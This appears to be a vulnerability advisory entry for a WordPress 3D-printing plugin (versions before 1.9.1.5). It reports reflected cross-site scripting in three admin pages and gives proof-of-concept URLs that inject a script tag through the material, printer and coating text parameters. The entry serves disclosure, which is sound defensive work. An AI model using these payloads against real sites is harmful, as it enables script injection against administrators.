The plugin does not sanitise and escape some user input before outputting it back in attributes, leading to Reflected Cross-Site Scripting issues
https://example.com/wp-admin/admin.php?page=p3dlite_materials&material_text="><script>alert(/XSS/)</script> https://example.com/wp-admin/admin.php?page=p3dlite_printers&printer_text="><script>alert(/XSS/)</script> https://example.com/wp-admin/admin.php?page=p3dlite_coatings&coating_text="><script>alert(/XSS/)</script> (< 1.9.1.5)
2021-10-11 (about 1 years ago)
2021-10-11 (about 1 years ago)
2021-10-11 (about 1 years ago)